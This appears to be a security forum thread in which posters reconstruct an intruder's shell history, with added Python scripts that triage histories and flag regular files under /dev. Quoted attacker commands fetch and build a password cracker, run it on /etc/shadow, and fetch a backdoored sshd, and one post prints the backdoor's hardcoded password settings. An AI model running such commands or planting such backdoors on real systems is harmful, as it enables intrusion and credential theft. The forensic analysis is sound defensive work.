  1. #21
    Senior Member
    Join Date
    Dec 2004
    Posts
    137
    Hi, I have a dumb question.

    pico genx.h
    pico genx.h
    pico ssh2includes.h
    why did he edit this?


    also, so he got in via a weak web account that was allowed to telnet and/or ssh?

  2. #22
    Junior Member
    Join Date
    Mar 2003
    Posts
    14
    My knowledge in linux is slowly coming back, but is this interpretation correct?

    w
    Does a who command to see who is all on the system.

    wget geocities.com/cretu_2004/john-1.6.tar.gz;tar zxvf john-1.6.tar.gz;rm -rf john-1.6.tar.gz;cd john-1.6/src;make linux-x86-any-elf;cd ../run;./john /etc/shadow

    These commands are broken into parts shown by a separator (the semicolon). First wget command grabs what I am guessing is john the ripper or another password cracker. Second command is to basically unzip the file in windows terms. Then he removes the original zipped up archive. Changes the directory and makes the exe. Next command changes directory to the executable file. Then the ./ runs the program on /etc/shadow. This would make me assume that he already had root from the exploit, but probably would rather have a valid account for later use.

    wget www.geocities.com/securedro/sshd.tar.gz;tar -xzf sshd.tar.gz;rm -rf sshd.tar.gz;cd sshd;cd apps/ssh

    Gets a file which I am guessing is a SSH server either whole because the target server didn't have the files installed or a hacked up version for his use.

    The rest of it is pretty much setting up the backdoor and cleaning up a little.

    That is just my interpretation of it broken down into tiny bits. Please point out any faulty points in my logic though cause I really need to get my linux skills back.
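The breakdown above is essentially what an analyst does by hand with a recovered shell history: split each `;`-chained line into its commands and look for the download, unpack, clean-up, build sequence ending in a sensitive file. The script below is an added example for that triage step; it is not code from this thread or from any tool the posters mention. The history lines it runs over are constructed from the commands quoted in the post, with one benign line mixed in, and the stage keywords are an assumed starting list, not an exhaustive one.

```python
"""
Added example: triage a recovered shell history by splitting ';'-chained
lines into individual commands and flagging the download -> unpack -> build
sequence discussed in the post. Not from the original thread.
"""
import re
import shlex

# Constructed sample history: the two chained lines quoted in the post plus
# two ordinary administrator commands.
SAMPLE_HISTORY = [
    "w",
    "wget geocities.com/cretu_2004/john-1.6.tar.gz;tar zxvf john-1.6.tar.gz;"
    "rm -rf john-1.6.tar.gz;cd john-1.6/src;make linux-x86-any-elf;"
    "cd ../run;./john /etc/shadow",
    "ls -la /var/log",
    "wget www.geocities.com/securedro/sshd.tar.gz;tar -xzf sshd.tar.gz;"
    "rm -rf sshd.tar.gz;cd sshd;cd apps/ssh",
]

# Assumed stage keywords (a starting list, not a complete one).
STAGES = {
    "download": {"wget", "curl", "ftp"},
    "unpack": {"tar", "unzip", "gunzip"},
    "cleanup": {"rm"},
    "build": {"make", "gcc", "cc"},
}
SENSITIVE_ARGS = ("/etc/shadow", "/etc/passwd")


def split_chain(line):
    """Split one history line on ';' and '&&' into its individual commands."""
    return [c.strip() for c in re.split(r";|&&", line) if c.strip()]


def classify(command):
    """Return the stage name a single command belongs to, or None."""
    try:
        argv = shlex.split(command)
    except ValueError:  # unbalanced quotes in the history line
        argv = command.split()
    if not argv:
        return None
    prog = argv[0].rsplit("/", 1)[-1]  # strip any leading path
    for stage, names in STAGES.items():
        if prog in names:
            return stage
    return None


def triage_line(line):
    """Summarise one history line: stages present and sensitive paths touched."""
    cmds = split_chain(line)
    stages = [s for s in (classify(c) for c in cmds) if s]
    sensitive = [p for p in SENSITIVE_ARGS if any(p in c for c in cmds)]
    # A download chained with an unpack or build step on the same line is the
    # tell-tale pattern from the post; ordinary admin work rarely looks like this.
    suspicious = "download" in stages and ("build" in stages or "unpack" in stages)
    return {
        "commands": len(cmds),
        "stages": stages,
        "sensitive": sensitive,
        "suspicious": suspicious,
    }


def triage_history(lines):
    """Run triage_line over every history line, keeping the line for the report."""
    return [(line, triage_line(line)) for line in lines]


if __name__ == "__main__":
    for line, info in triage_history(SAMPLE_HISTORY):
        flag = "SUSPICIOUS" if info["suspicious"] else "ok"
        print(f"[{flag}] {info['commands']} cmd(s) stages={info['stages']} "
              f"sensitive={info['sensitive']}")
```

Splitting on `;` with a plain regular expression ignores quoting, which is acceptable for a first pass over a history file; the point is to see the chain as stages rather than as one long line, the way the post reads it.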

  3. #23
    Master-Jedi-Pimps0r & Moderator thehorse13's Avatar
    Join Date
    Dec 2002
    Location
    Washington D.C. area
    Posts
    2,884
    Requirements will set the framework for security. Personally, I have also seen many apps use wget to grab updates via a daily cron job.
    Our scars have the power to remind us that our past was real. -- Hannibal Lecter.
    Talent is God given. Be humble. Fame is man-given. Be grateful. Conceit is self-given. Be careful. -- John Wooden

  4. #24
    Senior Member Maestr0's Avatar
    Join Date
    May 2003
    Posts
    604
    He downloaded a backdoored version of sshd and used pico to set the password before he compiled it.

    genx.h:
    Code:
    int genx=0,genxlookup=0;
    char genxpass[]="toji",genxbuf[1024];
    char genxfile[]="/dev/saux";
    -Maestr0
    "If computers are to become smart enough to design their own successors, initiating a process that will lead to God-like omniscience after a number of ever swifter passages from one generation of computers to the next, someone is going to have to write the software that gets the process going, and humans have given absolutely no evidence of being able to write such software." -Jaron Lanier
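The genx.h quoted above names /dev/saux as the file the backdoored sshd writes to. That is a useful thing to check for on a suspected host: /dev should contain device nodes, directories and symlinks, so a regular file there deserves a look. The script below is an added example of that check, not code from this thread; it walks a directory tree, reports regular files, and skips /dev/shm and /dev/mqueue, which legitimately hold ordinary files. It runs against a constructed temporary tree standing in for /dev, with a file named saux planted as the sample finding.

```python
"""
Added example: report regular files under a /dev-like tree. Not from the
original thread. The tree built here is a constructed stand-in for /dev.
"""
import os
import shutil
import stat
import tempfile

# Subdirectories of /dev where ordinary files are expected (assumed allowlist).
DEFAULT_IGNORE = ("shm", "mqueue")


def find_regular_files(root, ignore=DEFAULT_IGNORE):
    """Return root-relative paths of regular files under root.

    Symlinks are not followed and are not counted as regular files; the
    top-level directories named in `ignore` are skipped entirely.
    """
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        if dirpath == root:
            dirnames[:] = [d for d in dirnames if d not in ignore]
        for name in filenames:
            path = os.path.join(dirpath, name)
            if stat.S_ISREG(os.lstat(path).st_mode):
                hits.append(os.path.relpath(path, root))
    return sorted(hits)


def build_sample_dev():
    """Create a constructed stand-in for /dev and return its path."""
    root = tempfile.mkdtemp(prefix="fakedev_")
    # A symlink, as /dev commonly has; it must not be reported.
    os.symlink("nonexistent-target", os.path.join(root, "fd-link"))
    # shm legitimately holds regular files (POSIX semaphores, shared memory).
    os.makedirs(os.path.join(root, "shm"))
    with open(os.path.join(root, "shm", "sem.app"), "w") as f:
        f.write("")
    # The planted finding: a regular file with the name from the post's genx.h.
    with open(os.path.join(root, "saux"), "w") as f:
        f.write("constructed sample capture\n")
    return root


def remove_sample_dev(root):
    """Delete the constructed tree."""
    shutil.rmtree(root)


if __name__ == "__main__":
    root = build_sample_dev()
    try:
        for rel in find_regular_files(root):
            print(f"regular file under {root}: {rel}")
    finally:
        remove_sample_dev(root)
```

Against a real host, call `find_regular_files("/dev")` as root; anything it reports should be explained by a package or a known service before it is dismissed, and a capture file like the one in the post would also show up as a file that grows whenever someone logs in.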
